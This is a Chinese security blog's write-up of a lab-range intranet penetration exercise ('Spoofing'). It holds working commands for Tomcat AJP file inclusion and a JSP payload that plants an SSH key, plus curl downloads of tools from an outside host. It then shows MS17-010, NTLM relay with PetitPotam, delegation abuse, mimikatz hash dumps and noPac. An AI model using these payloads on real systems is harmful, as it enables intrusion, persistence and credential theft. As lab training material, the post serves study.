声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关
现在只对常读和星标的公众号才展示大图推送,建议大家把猫蛋儿安全“设为星标”,否则可能看不到了!
靶场简介
获取入口机权限
发现存在8009端口,可能存在Apache-Tomcat-Ajp (幽灵猫)文件包含漏洞。
python3 ajpShooter.py http://47.92.73.51:8009/ 8009 /WEB-INF/web.xml read | grep url-pattern
存在UploadServlet接口,上传后修改返回包,将路径最前面的点号去除
成功读取到内容
<% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDK0QreTZjWnB0V2JNQVJJTWY3U21teVVteElPSytKbEdNZFBVNWUzc3NoK2UrNVFKOEZTY29Gd1IyODVnSHltV2tWckc1NTVDVHFRSXhrZmxxTlgrS1dTeXZOM2hXalVaYktvcU9keUZ5SDEzMWtqTGkreEpxQnUrWktNTEFpVC9BdEJqK1VKQ1hueWVyVUFKSVc2R1d0R2o5VXNGS0lDb1VNdXFLUVRLUENmWHFrclRVNXRRTHZtODFNZCt6YnA3b2ZJOVJLeS85ektNaFBhaFpRTHkydjZVY3BROEVDb2twOXpBSlRzREYvMjBXTkM4VEJ3dlpIZTcxU1R3Z3ZodWxLSWZyK0hJT29ydjBMcVhiUHlpYVVOWm1hd1ZpelpiLzZjdk5zOS8yU3lLb0pQNHN5a0krbEE3OFZQc2lSSVpKN0lrdDRUTFg4RThBTDAyRFpUUTlETDNTdG1EQ2s1VFFvMldiNkhxTW8xODB0ZVBJN3N4T2NnOVpGeXFDenhnbGgvQkl6RERqTWNnU0ZYRHNEVFl3MG02OXgvNnF4QjlhYjl2M2JFWDhnc2M5UTRKUGppZkNHRnpnbngxVG95NGdjS0dXaktWRyt3cElMWXhTRkFLc3NqNnplQXUxT1dWUnJzZjdQTEJqV1lTdW84WXUwblRBemJSRjVLTFlTMjg9IiA+PiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5cwoKY2htb2QgNjAwIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCg==}|{base64,-d}|{bash,-i}").getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(""); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("");%>
写入成功,通过刚刚写的公钥进行ssh连接,获取到flag01:flag{41af3ec9-9043-42bc-9fb6-06d6a5aa5231}
内网横向
上传fscan对当前c段进行扫描
curl http://vpsip:8001/fscan_amd64 --output fscan_amd64
chmod +x ./fscan_amd64
./fscan_amd64 -h 172.22.11.1/24
./fscan_amd64 -h 172.22.11.1/24
___ _
/ _ ___ ___ _ __ __ _ ___| | __
/ /_/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\_______ (__| | | (_| | (__| <
____/ |___/___|_| __,_|___|_|_
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.11.6 is alive
(icmp) Target 172.22.11.26 is alive
(icmp) Target 172.22.11.45 is alive
(icmp) Target 172.22.11.76 is alive
[*] Icmp alive hosts len is: 4
172.22.11.6:139 open
172.22.11.26:135 open
172.22.11.45:135 open
172.22.11.6:135 open
172.22.11.76:22 open
172.22.11.45:139 open
172.22.11.26:139 open
172.22.11.26:445 open
172.22.11.45:445 open
172.22.11.6:445 open
172.22.11.76:8080 open
172.22.11.6:88 open
172.22.11.76:8009 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo:
[*]172.22.11.6
[->]XIAORANG-DC
[->]172.22.11.6
[*] NetBios: 172.22.11.6 [+]DC XIAORANGXIAORANG-DC
[+] 172.22.11.45 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] WebTitle: http://172.22.11.76:8080 code:200 len:7091 title:后台管理
[*] NetInfo:
[*]172.22.11.26
[->]XR-LCM3AE8B
[->]172.22.11.26
[*] NetBios: 172.22.11.26 XIAORANGXR-LCM3AE8B
[*] NetBios: 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
上传frp进行内网穿透,进入目标内网
curl http://vpsip:8001/frpc --output frpc
curl http://vpsip:8001/frpc.ini --output frpc.ini
chmod +x ./frpc
nohup ./frpc -c frpc.ini
上面fscan发现172.22.11.45存在17010,利用exp进行利用,成功添加用户test:test123!,并开启rdp进行连接。
XR-DESKTOP$/c657ea4fe01b0b4da120c98d99143a9e
yangmei/25e42ef4cc0ab6a8ff9e3edbbda91841
在机器中翻到第二个flag02:flag{b326254f-c786-4752-92ce-f511ed7e959d}
yangmei是域用户,通过https://github.com/lzzbb/Adinfo获取域内信息
./Adinfo_darwin -d xiaorang.lab --dc 172.22.11.6 -u yangmei -H 25e42ef4cc0ab6a8ff9e3edbbda91841
webclientservicescanner xiaorang.lab/[email protected] -hashes :25e42ef4cc0ab6a8ff9e3edbbda91841
这样从172.22.11.76:80 进来的流量直接转发到了我们本地
nohup socat TCP-LISTEN:80,fork,bind=0.0.0.0 TCP:localhost:99 &
ssh -i ~/.ssh/id_rsa [email protected] -R *:99:127.0.0.1:80
本地监听80,然后通过efs强制认证到本机80,relay到dc的ldap,设置XR-DESKTOP到172.22.11.26的基于资源的约束委派。
python3 ntlmrelayx.py -t ldap://172.22.11.6 -domain xiaorang.lab -smb2support --delegate-access --escalate-user XR-DESKTOP$ --no-dump --no-da
python3 PetitPotam.py -u yangmei -d xiaorang.lab ubuntu@80/print 172.22.11.26 -hashes :25e42ef4cc0ab6a8ff9e3edbbda91841
通过基于资源的约束委派获取ST票据,然后注入内存、wmiexec来获取交互式shell
python3 getST.py -dc-ip 172.22.11.6 -spn cifs/XR-LCM3AE8B.xiaorang.lab xiaorang.lab/XR-DESKTOP$ -impersonate administrator -hashes :c657ea4fe01b0b4da120c98d99143a9e
export KRB5CCNAME=administrator@[email protected]
python3 wmiexec.py -no-pass -k [email protected] -dc-ip 172.22.11.6
获得flag03:flag{7cd97e18-b25b-42f3-8006-f6d0fc2cbd42}
通过mimikatz获取172.22.11.26机器的lsass凭证:
/360244202dc4fcd431aae85c457cfccf
zhanghui/1232126b24cdf8c9bd2f788a9d7c7ed1
查询域内acl发现zhanghui在域内具有CreateChild权限。
[+] LDAP://172.22.11.6/CN=zhanghui,CN=Users,DC=xiaorang,DC=lab
[+] S-1-5-32-544-->Owner--->zhanghui
[+] Everyone-->DeleteChild(Generic)--->zhanghui
[+] Everyone-->ReadProperty(Generic)--->zhanghui
[+] NT AUTHORITYENTERPRISE DOMAIN CONTROLLERS-->GenericRead(Generic)--->zhanghui
[+] NT AUTHORITYAuthenticated Users-->GenericRead(Generic)--->zhanghui
[+] NT AUTHORITYSYSTEM-->GenericAll(Generic)--->zhanghui
[+] BUILTINAdministrators-->CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner(Generic)--->zhanghui
[+] Pre-Windows 2000 Compatible Access-->ListChildren(Generic)--->zhanghui
[+] Pre-Windows 2000 Compatible Access-->ReadProperty, ReadControl(Generic)--->zhanghui
[+] Domain Admins-->CreateChild, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl, WriteOwner(Generic)--->zhanghui
[+] Enterprise Admins-->GenericAll(Generic)--->zhanghui
[+] MA_Admin-->CreateChild(bf967a86-0de6-11d0-a285-00aa003049e2)--->zhanghui
拥有CreateChild权限意味着不受MAQ=0的限制,同样可以创建域内机器,尝试nopac通过create-child添加机器进行漏洞利用。
python3 noPac.py xiaorang.lab/zhanghui -dc-ip 172.22.11.6 -dc-host XIAORANG-DC --impersonate administrator -create-child -hashes :1232126b24cdf8c9bd2f788a9d7c7ed1 -use-ldap -shell
关于我们
点击下方名片进入公众号,欢迎关注!
点个小赞你最好看
原文始发于微信公众号(猫蛋儿安全):【内网攻防】春秋云镜-Spoofing-WriteUp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论